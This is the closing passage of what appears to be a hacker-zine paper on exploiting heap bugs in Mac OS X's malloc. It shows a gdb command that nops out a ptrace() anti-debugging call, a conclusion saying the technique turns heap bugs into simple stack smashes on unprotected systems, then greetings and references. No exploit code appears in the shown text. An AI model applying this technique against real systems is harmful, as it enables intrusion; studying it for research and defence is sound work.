int 0x80 on a Linux platform, or sysenter/int 0x2e in windows. 

In order to stop the ptrace() syscall from occurring we can simply 
replace this instruction in memory with a nop (no operation) 
instruction. This way the syscall will never take place and we can 
debug without any problems.

To patch this instruction in gdb we can use the command shown below and 
continue execution.

	(gdb) set *0x90054204 = 0x60000000
	(gdb) continue

--[ 6 - Conclusion

Although the technique which was described in this paper seem rather 
specific, the technique is still valid and exploitation of heap bugs in 
this way is definitely possible.

When you are able to exploit a bug in this way you can quickly turn a 
complicated bug into the equivalent of a simple stack smash (3).

At the time of writing this paper, no protection schemes for the heap 
exist for Mac OS X which would stop this technique from working. (To my 
knowledge).

On a side note, if anyone works out why the initial_malloc_zones struct is 
always located at 0x2800000 outside of gdb and 0x1800000 inside i would 
appreciate it if you let me know.

I'd like to say thanks to my boss Swaraj from Suresec LTD for giving me 
time to research the things which i enjoy so much.

I'd also like to say hi to all the guys at Feline Menace, as well as 
pulltheplug.org/#social and the Ruxcon team. I'd also like to thank the 
Chelsea for providing the AU felinemenace guys with buckets of corona to
fuel our hacking. Thanks as well to duke for pointing out the vm_allocate() 
bug and ilja for discussing all of this with me on various occasions.

"Free wd jail mitnick!" 

--[ 7 - References

1) Apple Memory Usage performance Guidelines:
	- http://developer.apple.com/documentation/Performance/Conceptual/
		ManagingMemory/Articles/MemoryAlloc.html

2) WebKit:
	- http://webkit.opendarwin.org/

3) Smashing the stack for fun and profit:
	- http://www.phrack.org/show.php?p=49&a=14

4) Mac OS X Assembler Guide
	- http://developer.apple.com/documentation/DeveloperTools/
		Reference/Assembler/index.html

5) Slashdot - Nokia Using WebKit
	- http://apple.slashdot.org/article.pl?sid=05/06/13/1158208

6) Darwin Source. 
	- http://www.opensource.apple.com/darwinsource/curr.version.number

7) Bug Me Not 
	- http://www.bugmenot.com

8) Open Darwin 
	- http://www.opendarwin.org

|=[ EOF ]=--------------------------------------------------------------=|